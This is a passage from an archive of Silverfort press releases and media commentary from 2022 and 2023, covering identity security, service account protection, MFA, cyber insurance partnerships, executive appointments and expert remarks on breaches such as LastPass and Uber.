and protected within 30 minutes. Automates and scales service account protection. Customers can create global policies covering thousands of service accounts with a single click, including gMSA accounts. Requires NO agent or proxies. Silverfort simplifies the security of service accounts without the need to change applications, implement software agents, proxies, or any password changes. “Identity is the most exposed, vulnerable and targeted attack surface. Organizations rely on point solutions to secure identities, and still, many identities are left unprotected—this typically includes services accounts,” said Hed Kovetz, CEO and Co-Founder of Silverfort. “Silverfort prides itself on the ability to protect the unprotected, including service accounts in a non-intrusive way. Silverfort is able to close this gap by automatically discovering, analyzing and protecting all service accounts without having to modify them, solving massive challenges for organizations when it comes to securing their identity attack surface. ” Silverfort is dedicated to protecting all identities—across the entire identity infrastructure—in a single solution, eliminating the need for point identity security solutions. 90% of businesses are hybrid environments, having on-prem and cloud-based infrastructure, and require a cross-platform solution that can provide visibility and protection of their entire hybrid environments. By being vendor agnostic, agentless, and combining visibility and protection into a single product, Silverfort is the only identity security platform that can protect all identities from a single, unified platform. Learn more about Silverfort’s Service Account Protection here. About Silverfort Silverfort is the only Unified Identity Protection Platform that extends identity protection to any sensitive resource, including ones that couldn’t be protected before, without having to modify them. That includes legacy systems, command-line interfaces, IT/OT infrastructure, service accounts (non-human identities) and many more. Silverfort delivers secure authentication and access policies across the entire hybrid identity infrastructure – both legacy and modern – from a single unified platform, and stops identity-based threats everywhere. Silverfort is headquartered in Tel Aviv, Israel, and was founded in 2016. --- - Published: 2023-09-06 - Modified: 2024-06-05 - URL: https://www.silverfort.com/press-news/silverfort-and-osterman-research-report-exposes-critical-gaps-in-identity-threat-protection/ Inaugural State of Identity Security report finds that 83% of organizations experienced an identity-related breach Boston & Tel Aviv, Sept. 6, 2023 — Silverfort, the Unified Identity Protection Platform leader, today announced its identity protection annual research report titled, The State of Identity Security: Insights into Critical Protection Gaps. Conducted by Osterman Research, the report finds the identity attack surface as the most significant gap in cybersecurity resilience today, with existing solutions like multi-factor authentication (MFA) and privileged access management (PAM) leaving critical exposures and allowing for the malicious use of compromised credentials. The survey behind this report, which included 637 respondents in identity roles at organizations with at least 1,000 employees, was conducted between May-June 2023.   The research finds that more than four out of five organizations have experienced a breach that involved the use of compromised credentials, half of which happened in the past 12 months. Furthering the challenges for CISOs is a continual misalignment between security and identity teams. Visibility into the identity attack surface continues to be insufficient, leaving organizations exposed to bad actors who can gain access to their environments, move laterally inside their networks, and wreak havoc in minutes. The protection of the identity attack surface – which extends far beyond traditional identity access management tools – is the last line of defense in detecting and preventing such threats in real time.    Key takeaways of the report include: Identity is the new top attack surface: More than 80% of organizations have experienced an identity-related breach that involved the use of compromised credentials, half of which happened in the past 12 months. Sporadic and poorly deployed MFA and PAM solutions fail to deliver 360º protection: 65% of organizations have not implemented MFA comprehensively enough to provide sound protection. In addition, only 10% of organizations have fully deployed PAM and have high confidence in its ability to prevent malicious use of privileged credentials due to the notorious complexity of implementing such solutions at scale. Limited visibility is creating ‘blind spots’ and exposed access points for bad actors: 94% of organizations do not have full visibility into their service accounts (non-human identities), making these highly vulnerable and often privileged identities a prime target for attackers. Real-time protection is missing: 78% of organizations admit that they cannot prevent the misuse of service accounts in real time, due to low visibility and inability to enforce MFA or PAM protection. Organizations are more exposed than ever: Only one in five organizations are highly confident that they could prevent identity threats. Very few organizations are confident they can stop malicious access or lateral movement using compromised credentials. “Today’s organizations are challenged with securing many different ‘silos’ of digital identity across complex hybrid and multi-cloud environments. Each of these environments has different identity security controls, which don’t work together and result in partial security, inconsistent user experience, and redundant costs,” said Hed Kovetz, CEO and Co-Founder of Silverfort. “In addition, some of the most critical systems in every company don’t have identity security available at all, and bad actors know it. This new research emphasizes that organizations need to rethink how they implement identity security, and develop a strategy that covers the entire identity attack surface – including human and non-human identities, privileged and non-privileged users, on-prem and cloud environments, IT and OT infrastructure, and many other areas that they didn’t previously manage to protect. ” For other valuable research information, download the full report here. About Silverfort Silverfort is the leader in Unified Identity Protection, enabling secure authentication and access across all corporate resources, both on-premises and in the cloud, to detect and stop identity-based attacks, including account takeover and ransomware spread. Using patented technology, Silverfort enforces its protection as a layer on top of the customer’s existing IAM infrastructure without requiring modifications to endpoints, servers, or applications—a capability which is unmatched in the market. This includes resources that couldn’t be protected before, such as legacy applications, command-line interfaces, industrial systems, machine-to-machine access, and more. Silverfort is trusted by hundreds of enterprise customers around the world, including Fortune 100 companies. For more information, visit www. silverfort. com.   --- - Published: 2023-03-20 - Modified: 2024-06-05 - URL: https://www.silverfort.com/press-news/silverfort-recognized-microsoft-security-excellence-awards-finalist-zero-trust-champion-security-isv/ Boston & Tel Aviv, March 20, 2023 — Silverfort, the leader in Unified Identity Protection, today announced it is a Zero Trust Champion and Security ISV of the Year award finalist in the Microsoft Security Excellence Awards. The company was honored among a global field of industry leaders that demonstrated success across the security landscape during the past 12 months. “Being selected as a finalist is great validation of everything the team has achieved over the last year,” said Hed Kovetz, CEO and Cofounder, Silverfort. “Working together with Microsoft, we are enabling an increasing number of organizations globally to secure the blind spots in identity, and it is an honor for this to be recognized. “ At the Microsoft Security Excellence Awards on April 24, 2023, Microsoft will celebrate finalists in 11 award categories honoring partner trailblazers, solution innovators, customer and technology champions, and changemakers. This is the fourth year Microsoft is recognizing partners for their outstanding work in the security landscape. All finalists are members of the Microsoft Intelligent Security Association (MISA), an ecosystem of independent software vendors (ISVs) and managed security service providers (MSSPs) that have integrated their security products and services with Microsoft’s security technology. “I’m very pleased to extend my warmest congratulations to this year’s finalists for the Microsoft Security Excellence Awards. These are presented each year to recognize the outstanding achievements of our Microsoft Intelligent Security Association members as they improve customers' ability to identify and respond to security threats. Our community is made up of the most reliable and trusted security vendors worldwide. This year we received hundreds of quality submissions from partners and Microsoft stakeholders, so this year's finalists stood out in a crowd of exceptional talent. It’s my pleasure to acknowledge and celebrate their work over the past year,” said Maria Thomson, Microsoft Intelligent Security Association Lead. MISA was established to bring together Microsoft leaders, ISVs, and MSSPs to work together to defeat security threats and make the world a safer place. The industry veterans in MISA and Microsoft will vote to select the winners of the Microsoft Security Excellence Awards, providing an opportunity for colleagues to honor their peers for delivering exceptional work to our shared customers. --- - Published: 2023-03-16 - Modified: 2024-06-05 - URL: https://www.silverfort.com/press-news/cbs17-scammers-are-using-the-svb-collapse-to-steal-identities/ Our Co-Founder and CTO, Yaron Kassner, talks to CBS17 about how businesses can protect themselves from attacks taking advantage of Silicon Valley Bank's recent collapse. Watch the feature here: https://www. cbs17. com/news/investigators/watch-out-scammers-are-using-the-silicon-valley-bank-collapse-to-steal-identity/ --- - Published: 2023-03-08 - Modified: 2024-06-05 - URL: https://www.silverfort.com/press-news/silverfort-introduces-five-senior-appointments/ Unified Identity Protection leader continues its fast growth, with 50% of all executive team positions now held by women. Boston & Tel Aviv, Wednesday March 8th, 2023 - Silverfort, the leader in Unified Identity Protection, today introduces five new senior executive team members as it continues to strengthen go-to-market, finance, product, and customer success functions to support strong global growth, following a record year in which the company almost tripled its revenues. The appointments include new leaders as well as internal promotions and underline the company’s dedication to encouraging a diverse workforce, with over 15 female managers hired or promoted into management over the last year, and with women now representing almost 40% of all managerial roles and 50% of the Senior Management Team. The new and promoted members of Silverfort’s executive team and their respective positions are as follows: Michelle Wideman, Chief Customer Officer Michelle will oversee Silverfort’s Customer Success and Support teams, optimizing the customer journey to help them realize the full value of Unified Identity Protection. More than 20 years’ experience, including Chief Customer Officer roles at companies such as Dell Boomi and Onna, have seen her receive accolades from organizations such as PartnerHacker and Customer Success Collective. She is also a Distinguished Alumna at Elon University. Tarah Cammett, Chief Marketing Officer With 23 years’ technology marketing experience at companies such as Carbon Black and Immersive Labs, Tarah brings brand, demand generation and global sales support together with empathic leadership to drive growth. Based in Silverfort’s Boston office, she was recognized as one of the Top 25 Women Leaders in Cybersecurity in 2021 by The Software Report. Irena Meaden, Chief Financial Officer Newly promoted CFO Irena brings over 20 years in economics, corporate finance, risk, and business management. With previous roles at organizations spanning from Bank of Israel and AIG to fast-growth startups, she is well positioned to help Silverfort steer a sustainable and effective path to growth. Revital Aronis, VP of Product Management Newly promoted VP of Product Management, Revital, will oversee the continual evolution of Silverfort’s Unified Identity Protection platform. Starting her career at Israel’s elite 8200 Unit, and previously at Illusive Networks, her 15 years’ experience will help the company continually augment the platform to help customers address identity security risks using innovative technology. Leslie Bois, VP of Global Channels A regular fixture on the CRN Channel Chiefs list, Leslie will be responsible for executing and accelerating Silverfort’s global channel strategy. Drawing on experience as Vice President of Global Channels and Alliances at Veracode and Kaspersky Lab, she will be responsible for putting in place a channel-first strategy to help Silverfort scale globally through a balanced ecosystem of partners. Liat Gavrieli, VP of HR at Silverfort, said “We are excited to have such talented leaders join our team or get well-deserved promotions, and we are also proud to see that by building a culture which selects the best people for the job, diversity has naturally taken root. “International Women’s Day gives us the perfect opportunity to shine a light on how this approach has helped us organically build a strong and effective team with a high percentage of senior female leaders, who are so good at what they do. I look forward to working alongside the entire Senior Management Team as we continue to grow globally as a leader in Unified Identity Protection. ” More details on careers at Silverfort can be found on the website. --- - Published: 2023-02-21 - Modified: 2024-06-05 - URL: https://www.silverfort.com/press-news/john-paul-cunningham-joins-silverfort-as-ciso/ Career CISO with experience working for organizations such as Bank of Hope and J. P Morgan Asset Management joins Unified Identity Protection leader Boston & Tel Aviv, 21 February, 2023 - Silverfort, a leader in Unified Identity Protection, today announced the appointment of John Paul Cunningham as Chief Information Security Officer. With over 24 years’ experience managing cyber risk at Fortune 100 companies - and another 8 years in the Fortune 1000 - John Paul will work with customers and partners to build an understanding of the strategic benefits of modern identity protection. In addition, he will also design and implement Silverfort’s own cybersecurity program. In his previous role as CISO at Bank of Hope, John Paul was responsible for working with the board to build operating models designed to reduce cost and cyber risk, while also adhering to rigorous compliance standards. Prior to this, he held similar positions at Docupace, Ares Management and J. P. Morgan Asset Management building information security, risk management, and security operations programs from scratch. “Silverfort has built a unique proposition which not only has immediate tactical use, enabling MFA to protect resources such as Command Line Interfaces and ICS systems with MFA for example, but also has far-reaching strategic benefits. Improving identity security posture has the potential to reduce a significant portion of risk, while also streamlining cost and complexity,” said John Paul Cunningham, Chief Information Security Officer, Silverfort “For too long organizations have relied on a narrow, piecemeal approach to identity security. Silverfort is changing this - so it’s exciting to be a part of a team taking this to market,” he added. “It’s a privilege to have a seasoned operator such as John Paul join the growing team at Silverfort,” said Hed Kovetz, CEO, Silverfort. “His experience operating at a senior level within large organizations will help us as we continue pushing into a greater number of enterprise environments. John-Paul’s background building risk management programs will also be invaluable as we scale our own security operations. ” Silverfort extends modern identity security to the sensitive resources targeted by attackers, including those which couldn’t be protected previously, such as legacy applications, command line interfaces, service accounts and more. For more information, visit www. silverfort. com --- - Published: 2023-02-02 - Modified: 2024-06-05 - URL: https://www.silverfort.com/press-news/silverfort-launches-free-identity-risk-assessment/ Thursday 2 February 2023, Boston and Tel Aviv: Unified Identity Protection leader, Silverfort, today launched the most comprehensive free cyber insurance assessment available to help organizations discover the gaps and hygiene issues in their identity attack surface which may cause cyber insurance compliance failures. Intended to be used by companies with 250 or more employees, the assessment will help meet expanding cyber insurance requirements in advance of a policy application or renewal. Simple to deploy and providing visibility into all user authentications, Silverfort’s identity risk assessment operates at a directory level to report with in-depth visibility on the identity attack surface. The report summarizes risky user accounts and authentications as well as risk indicators such as shadow admins, passwords that never expire, admins liable to Kerberoasting, pass-the-ticket and lateral movement attempts, authentications using weak encryption protocols, unprotected Service Accounts and more.   These common attack paths are used by threat actors to move laterally around an organization and propagate the ransomware responsible for more than half of all cyber insurance payouts last year. For this reason, identity security hygiene has become increasingly important to insurance underwriters. Cyber insurance premiums continue to increase due to the routine manner by which adversaries use these gaps in identity to spread in their victim’s environment and ultimately extort them for payment. In response, insurance carriers and brokers have added detailed identity security requirements and increased scrutiny around how controls are deployed and managed. MFA is now required to protect an expanded range of internal apps, interfaces, and systems, including VPNs, file shares, networking equipment, legacy systems, and CLI admin tools. Insurers are also increasing Privileged Access Management (PAM) requirements for highly privileged and non-human users, with the discovery and password hygiene of Service Accounts coming under particular scrutiny.   Hed Kovetz, CEO and Co-Founder of Silverfort, said, “Insurance carriers are waking up to the path of least resistance presented by the identity-based attack surface. Once initial compromise is achieved, countless attack paths into critical areas of every environment are exposed, significantly increasing the chance of an attack succeeding. This makes it very difficult for insurers to correctly price the risk. “Our free identity risk assessment provides organizations a clear view of their exposure. With the results they can better understand the steps necessary to improve security posture and insurability, such as applying MFA to critical resources and protecting Service Accounts. We hope this helps put more affordable insurance policies in reach of more organizations. ” The free assessment is part of a broader program to improve the identity security maturity of organizations for insurance compliance attestation. Major brokers such as Acrisure, Howden Group and other insurance carriers and intermediaries are now offering Silverfort’s Unified Identity Protection solution to help more customers qualify for cyber insurance policies.   To request an assessment, simply register on the Silverfort website and a representative will be in touch to assist. --- - Published: 2022-12-12 - Modified: 2024-06-05 - URL: https://www.silverfort.com/press-news/howden-group-simplifies-cybersecurity-insurance-compliance-with-silverfort/ Partnership enables international broker to offer customers in 45 countries effortless deployment of MFA on previously ‘unprotectable’ resources and automated protection for Service Accounts  Monday 12 December 2022, Tel Aviv and London: International insurance broker, Howden Group, and Unified Identity Protection leader, Silverfort, today announced a partnership to make it easier for organizations to comply with the increasingly strict identity security controls now being required in cyber insurance policies.   With attackers taking advantage of narrowly deployed MFA solutions, and a lack of protection for non-human identities (Service Accounts) to spread ransomware, steal data and compromise critical systems, the cost of cybersecurity insurance policies has been increasing and exclusions have become stricter. To counter this, many carriers are now mandating identity security controls with greater breadth and depth. The partnership seeks to address this compliance need by offering Silverfort’s Unified Identity Protection solution. This will enable Howden Group’s global customer-base to extend MFA to all their sensitive resources, including previously ‘unprotectable’ ones such as legacy applications and directories, Command Line Interfaces and other admin access tools, network infrastructure, industrial OT systems and more, without the need to modify these systems. It also allows customers to discover, monitor and secure the automated Service Accounts often used by attackers in lateral movement - quickly and easily. Howden Group’s Global Head of Cyber Insurance, Shay Simkin, said, “As a group, we are dedicated to helping our customers get the most out of their cybersecurity insurance policy, which puts a responsibility on them to reach a certain level of maturity. “Silverfort helps our customers achieve this by vastly reducing the identity attack surface, with MFA on all internal resources and protection for Service Accounts, all without having to go through a long and expensive deployment process. This reduces a large swathe of risk that would otherwise lead to successful ransomware attacks, data breaches and significant disruption. ” As a large global broker with around $30bn in Gross Written Premiums, Howden Group helps insure some of the largest organizations in the world. Silverfort will be offered to the company’s customer-base alongside a set of complementary products designed to prevent a wide range of risks, including endpoint protection, security awareness training and more. Hed Kovetz, CEO & Co-Founder of Silverfort, said “Organizations often assume their existing identity controls are sufficient to comply with cyber insurance policies, however this is not always the case. Closing the gaps in MFA coverage and protecting privileged users and non-human identities are increasingly cited by insurance carriers as mandatory – but are often too difficult for customers to implement quickly enough. “Thanks to Silverfort’s unique technology which doesn’t require any changes to the customer’s systems, we already help hundreds of companies to fully meet these requirements, with a deployment time measured in hours, rather than months. We look forward to helping Howden Group customers fix this problem, quickly and easily. ” For more information about Silverfort and Howden's partnership, visit this page. --- - Published: 2022-12-06 - Modified: 2024-06-05 - URL: https://www.silverfort.com/press-news/security-boulevard-flaw-in-aged-boa-web-server-threatens-supply-chain/ Microsoft may have retired the Boa web server in 2005, but that hasn’t stopped widespread use—and now the company is saying a vulnerability in the server’s open source component has been exploited by bad actors, targeting the energy industry and underscoring the continued vulnerability of the supply chain. “Age-old vulnerabilities such as this provide a jumping-off point for attackers looking to move laterally to more sensitive areas by abusing the identity attack surface,” said Sharon Nachshony, security researcher at Silverfort. “With access to critical areas inside OT environments, their activities can quickly become significantly more impactful. ” “There is a long-standing supply chain risk to IoT and OT environments from legacy technology,” Nachshony said, which is why it’s critical to stay current with updates and fixes. “While hard to manage, given the abundance of such technology in critical industries, a rigorous patching regime is essential. ” Read the full story in Security Boulevard here. --- - Published: 2022-12-06 - Modified: 2024-06-05 - URL: https://www.silverfort.com/press-news/cpo-magazine-a-decade-of-discussion-and-were-still-not-thinking-laterally/ Lateral movement has been a common factor in breaches for some time. As the effectiveness of perimeter defences has been gradually eroding, the main issue for attackers is no longer how to get into an organization – but how to move across the network to access their final target. The typical environment has developed over time into a fragmented collection of technical resources – a variety of applications, servers, IT infrastructure, cloud workloads and more. While these resources are separate, they are all connected by identity and access management– the infrastructure governing access throughout. This is what attackers use to move laterally. Starting at patient zero, they move from one machine to another by abusing identity until arriving at their target destination to drop ransomware, steal sensitive information and more. Read the full article in CPO Magazine here. --- - Published: 2022-12-05 - Modified: 2024-06-05 - URL: https://www.silverfort.com/press-news/computerweekly-lastpass-probes-new-cyber-incident-related-to-august-attack/ The August 2022 cyber attack on LastPass seems to have begat another incident, according to company CEO Karim Toubba Credential management specialist LastPass has disclosed a new cyber security incident – its second in four months – that seems to have its roots in the first. The company launched an investigation, notified law enforcement and brought on board expertise from Mandiant, after it spotted unusual activity in an undisclosed third-party cloud storage service, which it shares with its affiliate GoTo, a unified communications company. LastPass CEO Karim Toubba said the investigation found that an unauthorised party used information stolen in the August 2022 incident to access “certain elements” of customers’ information. Customer passwords were not impacted and remain safely encrypted, he said. Silverfort senior researcher Yoav Iellin commented: “Given the vast amount of passwords it protects globally, LastPass remains a big target. “The company has admitted the threat actor gained access using information obtained in the previous compromise. Exactly what this information is remains unclear, but typically, it is best practice after suffering a breach for the organisation to generate new access keys and replace other compromised credentials. This ensures things like cloud storage and backup access keys cannot be reused. Iellin added: “For worried users, ensure you watch out for updates from the company and take time to verify that these are legitimate before taking any action. “In addition, ensuring you have two-factor authentication on any applications with passwords in LastPass, and changing passwords, will provide the utmost level of security. ” Read the full story in ComputerWeekly. com here. --- - Published: 2022-12-01 - Modified: 2024-06-05 - URL: https://www.silverfort.com/press-news/forbes-new-lastpass-hack-confirmed-heres-what-we-know-so-far/ On Wednesday, 30 November, LastPass CEO, Karim Toubba, confirmed that an unauthorized party had gained access to "certain elements of our customers' information" within a third-party cloud storage service. The data breach was, Toubba stated, made possible using information obtained from a previous hacking incident in August this year. At that time, Toubba said that portions of source code and some proprietary LastPass technical information had been accessed. It is not clear, however, what specific information enabled the threat actor to gain access to the cloud storage service in the latest breach. "Given the vast amount of passwords it protects globally, LastPass remains a big target," Yoav Iellin, a senior researcher at Silverfort, says. "The company has admitted the threat actor gained access using information obtained in the previous compromise. Exactly what this information is remains unclear, but typically, it’s best practice after suffering a breach for the organization to generate new access keys and replace other compromised credentials. This ensures things like cloud storage and backup access keys cannot be reused. " Read the full story in Forbes here. --- - Published: 2022-11-17 - Modified: 2024-06-05 - URL: https://www.silverfort.com/press-news/security-magazine-iranian-apt-breaches-government-agency-using-log4shell/ Iranian government-sponsored advanced persistent threat (APT) actors breached the Federal Civilian Executive Branch (FCEB) and its network, according to a cybersecurity advisory released by the U. S. Cybersecurity and Infrastructure Security Agency (CISA) and the Federal Bureau of Investigation (FBI).   In the course of incident response activities, CISA determined that the APT actors exploited the Log4Shell vulnerability in an unpatched VMware Horizon server, installed XMRig crypto mining software, moved laterally to the domain controller (DC), compromised credentials, and then implanted Ngrok reverse proxies on several hosts to maintain persistence. Yaron Kassner, CTO and Co-Founder of Silverfort, says, “The alert from CISA is evidence of the unfortunate legacy we were warned to expect from Log4Shell at the time of its discovery. It is a gift to state actors and access brokers, and this attack is proof of the impact critical vulnerabilities such as this can have when left unpatched. As we see here, once a toehold is gained — attackers are then able to simply pick up administrator credentials and use them to move laterally before eventually compromising the entire domain. This emphasizes the need for MFA inside the network, which was clearly missing here. Hopefully, crypto-mining was the sole outcome of this attack and not more than that. ” Read the full story in Security Magazine here. --- - Published: 2022-11-03 - Modified: 2024-06-05 - URL: https://www.silverfort.com/press-news/acrisure-silverfort-partnership-announcement/ New partnership to help policyholders easily meet growing identity protection requirements Thursday 3 November 2022, Boston, MA: Silverfort, a unified identity protection leader, today announced a partnership with Acrisure Cyber Services (ACS). ACS is a division of Acrisure, a global fintech that operates a top-10 global insurance broker that also provides cyber services, real estates services and asset and wealth management. Silverfort is known for helping organizations of all sizes meet an increasingly rigorous identity and access management compliance burden emerging in cyber insurance policies. The increasing sophistication of cyber attacks continues to expose the IT infrastructures of organizations, which is driving up cyber insurance premiums. As a result, underwriters are increasingly mandating that Multi Factor Authentication (MFA) is applied with far greater depth than before to inhibit threat actors’ movements as they propagate attacks.   ACS will deliver Silverfort as part of its “Security as a Service” model, sitting alongside other technologies intended to provide companies of all sizes with full compliance to a range of carrier policies. Alongside Silverfort, this stack of technologies also covers endpoint security, vulnerability detection and management, backup and disaster recovery, security awareness training and email security.   Silverfort will help enable ACS clients to comply with requirements by seamlessly extending MFA to previously unprotectable resources. Organizations will be able to enforce MFA across all on-prem and cloud resources including on email, remote network access tools, network infrastructure, directories, servers, workstations and even on legacy protocols that allow ransomware attacks to spread. It will also allow customers to automatically discover, monitor and secure the automated Service Accounts commonly used in data breaches, without having to modify them. Hed Kovetz, CEO and Co-Founder of Silverfort, said, “Driven by a rising volume of attacks propagating through unprotected technical resources, many policies now require far more comprehensive identity protection and access controls. While many may have MFA at a surface level - this no longer goes deep enough for underwriters, risking decreased coverage, being denied policies, or having claims rejected in the event of an incident. We address this gap. Partnering with Acrisure Cyber Services means we can help more companies become compliant with tightening industry standards and we look forward to working together. ” Acrisure Cyber Services President, Bill Meara, said, “Requirements in cybersecurity insurance policies are evolving as the industry continues to adapt to a fast-changing risk. Many carriers now mandate securing previously unprotectable areas with authentication and access controls, which is often difficult through traditional methods. The partnership with Silverfort helps companies of all sizes remain compliant in a simple and effective manner. ” More information on how Silverfort helps companies comply with emerging cybersecurity insurance standards can be found here. Further details on Acrisure Cyber Services can also be seen here. --- - Published: 2022-10-21 - Modified: 2024-06-05 - URL: https://www.silverfort.com/press-news/spiceworks-how-can-organizations-prevent-lateral-movement-attacks-by-harnessing-risk-analysis-and-mfa/ In a world that has grown accustomed to the inevitability of initial compromise, lateral movement is becoming the new battleground. The perimeter has dissolved, and a new attack surface has been exposed. https://www. silverfort. com/wp-content/uploads/2022/06/Thumbnails-for-Resources-and-blog-green_0001s_0001_Generic1-Archive-card-842x626px-24. png Keshet, director of product marketing at Silverfort, looks at how risk analysis and MFA can help prevent lateral movement attacks. Starting at an initial toehold on a single machine – lateral movement is a critical phase for attackers looking to reach sensitive and vital systems. It allows them to hop from machine to machine to position themselves for maximum impact eventually.   So, what do cybercriminals do when they perform lateral movement attacks – and what can be done to defend against them? To read the full story, visit the Spiceworks website here. --- - Published: 2022-09-22 - Modified: 2024-06-05 - URL: https://www.silverfort.com/press-news/press-washington-examiner-silverfort-comments-on-uber-hack/ On Sept. 19, the Uber hack was blamed on hacking group Lapsus$, which the company announced days earlier. Lapsus$ is an international hacking group known for attacking companies in the tech industry, including Microsoft, Cisco, Samsung, and Nvidia, in 2022 alone. “The attacker accessed several internal systems, and our investigation has focused on determining whether there was any material impact,” Uber said in a statement. At the end of its last financial year, Uber had 118 million active regular users. According to Silverfort's CTO and co-founder, Yaron Kassner, Lapsus$ has previously extorted the victims of its attacks and threatened to leak data if its demands weren't met. “Publishing such information also serves to bolster their credentials and show future victims their intentions are serious,” Kassner told the Washington Examiner. While Uber has said that it has not seen a breach of customer data, it may be too early to tell, Kassner said. Whether or not customer information is involved is “something that will only be fully ascertained once an incident investigation is complete, which takes time,” Kassner. “Given the high level of privileges obtained, it remains a possibility. ” To read the full story with Silverfort's commentary on the Uber hack, click here. For the key lessons we've learned from the Uber hack, check out our blog here. --- - Published: 2022-09-13 - Modified: 2024-06-05 - URL: https://www.silverfort.com/press-news/press-help-net-security-tim-fleming-appointed-as-strategic-advisor/ Unified Identity Protection company Silverfort has appointed Tim Fleming as Strategic Advisor. Responsible for all commercial and operational technology strategy at Deloitte for over 20 years, as CIO of Australia and APAC, Tim oversaw a team of more than 1300 with direct accountability for countries including India, China, Taiwan and Japan. “As someone with a very clear perspective on where identity fits into a wider picture of organizational risk, Tim is perfectly positioned to help us as we continue to scale,” said Hed Kovetz, CEO and Co-founder, Silverfort. “My time at Deloitte taught me the importance of embracing emerging technologies to resolve business problems, something Silverfort is well-positioned to help achieve. Not only does the platform have immediate tactical benefits – extending MFA to legacy systems or protecting non-human identities, for example – but it can also consolidate visibility and security across the different identity platforms on-prem and in the cloud, to play a more strategic role,” said Tim Fleming, Strategic advisor, Silverfort. “Overall, Silverfort’s defensive capabilities against cyber threats such as Ransomware are, I believe, second to none,” Fleming continued. To read the full story in Help Net Security, click here. To read the press release, click here. --- - Published: 2022-09-11 - Modified: 2024-06-05 - URL: https://www.silverfort.com/press-news/ex-deloitte-cio-joins-silverfort-as-strategic-advisor/ Tim Fleming brings over 40 years’ risk management and innovation experience at large organizations to fast-scaling Unified Identity Security platform  12 September, Gartner IT Symposium/Xpo, Australia: Unified Identity Protection company Silverfort today announced the appointment of ex-Deloitte Australia and APAC CIO and Partner, Tim Fleming, as Strategic Advisor. Responsible for all commercial and operational technology strategy at Deloitte for over 20 years, as CIO of Australia and APAC Tim oversaw a team of more than 1300 with direct accountability for countries including India, China, Taiwan and Japan. During his tenure, the company embarked on a period of rapid technical change which contributed to a five-fold growth in revenues. Previously Head of Global Transformation and Innovation – as well as a member of the Global Cyber Committee – Tim also has significant experience helping organizations embrace emerging technologies to mitigate business risks and meet regulatory and certification requirements. Hed Kovetz, Co-Founder and CEO of Silverfort, said, “As someone with a very clear perspective on where identity fits into a wider picture of organizational risk, Tim is perfectly positioned to help us as we continue to scale.   “His on-the-ground experience will not only be invaluable as we grow our operations in APAC, but he also brings a unique understanding of the role identity can play in board-level conversations about risk. This will be critical as our platform continues to see adoption with some of the largest organizations in the world. ” Tim Fleming, Strategic Advisor at Silverfort, said “My time at Deloitte taught me the importance of embracing emerging technologies to resolve business problems, something Silverfort is well-positioned to help achieve. Not only does the platform have immediate tactical benefits – extending MFA to legacy systems or protecting non-human identities, for example – but it can also consolidate visibility and security across the different identity platforms on-prem and in the cloud, to play a more strategic role. “Overall, Silverfort’s defensive capabilities against cyber threats such as Ransomware are, I believe, second to none. ” Tim will be with the Silverfort APAC team located on stand 417 at the Gartner IT Symposium/Xpo. More information can be found at silverfort. com About SilverfortSilverfort is the leader in Identity Threat Protection, enabling secure authentication and access in a unified manner across all corporate resources, both on-premises and in the cloud, to detect and stop identity-based attacks including account takeover and ransomware propagation. Using patented technology, Silverfort enforces its protection as a layer on top of the customer’s existing IAM infrastructure, without requiring modifications to endpoints, servers or applications – a capability which is unmatched in the market. This includes resources that couldn’t be protected before, such as legacy applications, command-line interfaces, industrial systems, machine-to-machine access and more. Its platform enables Identity Threat Detection and Response (ITDR), agentless Multi-Factor Authentication (MFA), discovery and protection of service accounts (non-human identities), and adaptive Zero Trust security policies. Silverfort is trusted by hundreds of enterprise customers around the world, including Fortune 100 companies. It has been named a Gartner ‘Cool Vendor’ and received dozens of other industry awards.  See a demo to learn more. About Gartner IT Symposium/Xpo 2022 Gartner IT Symposium/Xpo 2022 is the world's most important gathering for CIOs and other IT executives. IT executives rely on these conferences to gain insight into how their organizations can use IT to overcome business challenges and improve operational efficiency. For more information, please visit www. gartner. com/au/symposium. --- - Published: 2022-08-30 - Modified: 2024-06-05 - URL: https://www.silverfort.com/press-news/technology-mag-how-can-organisations-ensure-cyber-resilience/ Yaron Kassner, Co-Founder and CTO of Silverfort, spoke to Technology magazine about how businesses can develop cyber resilience. Keeping up with the latest attack patterns from malware groups has always been a top security priority. But while it is essential to understand how cyber criminals gain initial access, it has become increasingly important to focus on what happens after this - understanding how they move from one machine to another. Technology Magazine asked Yaron how ransomware attackers use lateral movement to attack an organisation and what can be done to ensure cyber resilience. How can any organisation strengthen their cyber resilience against lateral movement attacks? Lateral movement used to be the preserve of highly resourced attack groups but, as with anything in cybersecurity, has become commoditized. First, organisations need to realise this and build lateral movement prevention into wider risk reduction strategies.   Next, they need visibility of such attacks. Until now, this has been a challenging task because spotting malicious access requests has been difficult. However, it is now possible to apply risk-based analysis to identity data to spot the anomalies which are a marker of threat actors. This ultimately means understanding what constitutes a ‘normal’ baseline for identity, and then monitoring for things like abnormal volumes and types of requests.   Most importantly, they can apply proactive rules and policies to act as gatekeepers around sensitive resources. This can come in the form of an MFA request designed to ensure that only the right person is allowed to access the asset in question. To read the full article, click here. --- - Published: 2022-08-09 - Modified: 2024-06-05 - URL: https://www.silverfort.com/press-news/security-mag-hashed-passwords-exposed-in-slack-vulnerability/ Office communication platform Slack has admitted to accidentally exposing the hashed passwords of some users. According to Wired, the vulnerability which exposed cryptographically scrambled versions of some users' passwords goes back five years, between April 17, 2017 and July 17, 2022 and impacted anyone who created or revoked a shared invite link. The workspace application began sending password reset links to affected users on August 4, a few days after an independent security researchers disclosed the vulnerability to Slack on July 17. Slack said the flaw impacted about 0. 5 percent of its users, which could mean approximately 50,000 users, as the company said it had over 10 million daily active users in 2019. Sharon Nachshony, Security Researcher at Silverfort, explains, “Hashes of salted passwords being leaked is not as dangerous as exposing them in plain-text, as an attacker would have to use brute-force methods — essentially automating a script to guess passwords — which takes some time. " While this makes exploitation less likely, Nachshony says “a threat actor may still be motivated to do this because Slack is used by so many companies. Incidents like these are once again a clear argument for users to enable MFA. If implemented correctly, this would alert the legitimate user to any authentication attempt on their behalf, denying any malicious access attempt. ” To read the full article in Security Magazine, click here. --- - Published: 2022-05-11 - Modified: 2024-06-05 - URL: https://www.silverfort.com/press-news/silverfort-21-calcalist-list-50-most-promising-israeli-startups/ The field of identity verification in the cyber world is full of competition on the one hand, and saturated with threats on the other. One of the most prominent companies in this market is the Israeli company Silverfort, which this year managed to raise $65 million from a number of prominent VC funds. The founders of the company, graduates of the IDF’s prestigious 8200 intelligence unit, understood that the world of identities needed a responsible adult who knew how to manage them all. Silverfort's patented technology enforces protection on the customer's existing infrastructure, as a uniform layer of security over all existing identification systems, without requiring changes to existing systems or installing software on them. For the full article, click here. --- - Published: 2022-04-11 - Modified: 2024-06-05 - URL: 